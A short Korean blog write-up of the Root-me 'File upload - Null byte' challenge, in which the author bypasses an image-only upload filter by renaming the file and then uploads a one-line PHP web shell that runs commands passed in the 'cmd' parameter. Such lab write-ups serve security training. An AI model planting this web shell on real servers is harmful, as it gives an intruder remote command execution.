vared
vared - Blog
vared
전체 방문자
17,902
오늘
2
어제
19
  • 분류 전체보기 (132)
    • Study (0)
    • Project (0)
    • Paper Review (0)
    • Tool (1)
    • WriteUp (124)
      • Root-me.org (44)
      • LOS_rubiya (32)
      • Webhacking.kr (21)
      • DreamHack (9)
      • XCZ.kr (8)
      • HackCTF (10)
    • Miscellaneous (0)
    • Forensic-CheatSheet (5)

블로그 메뉴

  • Category

공지사항

  • Forensic-CheatSheet 오픈

인기 글

  • Root-me[web_client] : Javascript⋯
    2020.09.01
    Root-me[web_client] : Javascript⋯
  • [Upload] Recycle Bin 아티팩트
    2023.01.26
  • [Root-me] : Logs analysis - web ⋯
    2021.01.27
  • [Root-me] : Active Directory - G⋯
    2021.01.28
    [Root-me] : Active Directory - G⋯
  • ETHERNET - Patched transmission
    2020.06.16
    ETHERNET - Patched transmission

태그

  • JavaScript
  • File Execution
  • Digital-Forensic
  • sql injection
  • webhacking.kr
  • LNK FIile
  • Windows Artifact
  • Los

최근 댓글

  • 감사합니다 :)
    vared
  • 글 솜씨가 뛰어나시네요! 좋은 글 잘 보고 갑니다 다음에도⋯
    alpha-traveler

최근 글

  • [Upload] Recycle Bin 아티팩트
    2023.01.26
  • [Upload] SRUM 아티팩트
    2023.01.17
  • [Upload] LNK File 아티팩트
    2022.12.26
  • [Upload] prefetch 아티팩트
    2022.12.02
  • [Upload] VBR
    2022.10.23

티스토리

hELLO · Designed By 정상우.
vared

vared - Blog

Root-me : File upload - Null byte
WriteUp/Root-me.org

Root-me : File upload - Null byte

2020. 12. 31. 16:01

느낌상 웹쉘을 올려야 하는 문제인 것 같다. 

NB : only GIF, JPEG or PNG are accepted 

다음과 같은 필터링이 있기 때문에, 

다음과 같이 이름을 수정해서 올려주면 된다.

<?php
	system($_GET['cmd']);
?>

찾으라는 문구가 있을줄 알았는데 바로 패스워드가 있다.

 

Clear!

저작자표시

'WriteUp > Root-me.org' 카테고리의 다른 글

[Root-me] : Logs analysis - web attack  (0) 2021.01.27
JSON Web Token (JWT) - Weak secret  (0) 2021.01.02
Root me : Directory traversal  (0) 2020.12.28
Rootme : Insecure Code Management  (0) 2020.12.28
Root-me : JSON Web Token (JWT) - Introduction  (0) 2020.12.28
    'WriteUp/Root-me.org' 카테고리의 다른 글
    • [Root-me] : Logs analysis - web attack
    • JSON Web Token (JWT) - Weak secret
    • Root me : Directory traversal
    • Rootme : Insecure Code Management
    vared
    vared
    댓글쓰기
    JSON Web Token (JWT) - Weak secret
    다음 글
    JSON Web Token (JWT) - Weak secret
    Root me : Directory traversal
    이전 글
    Root me : Directory traversal

    티스토리툴바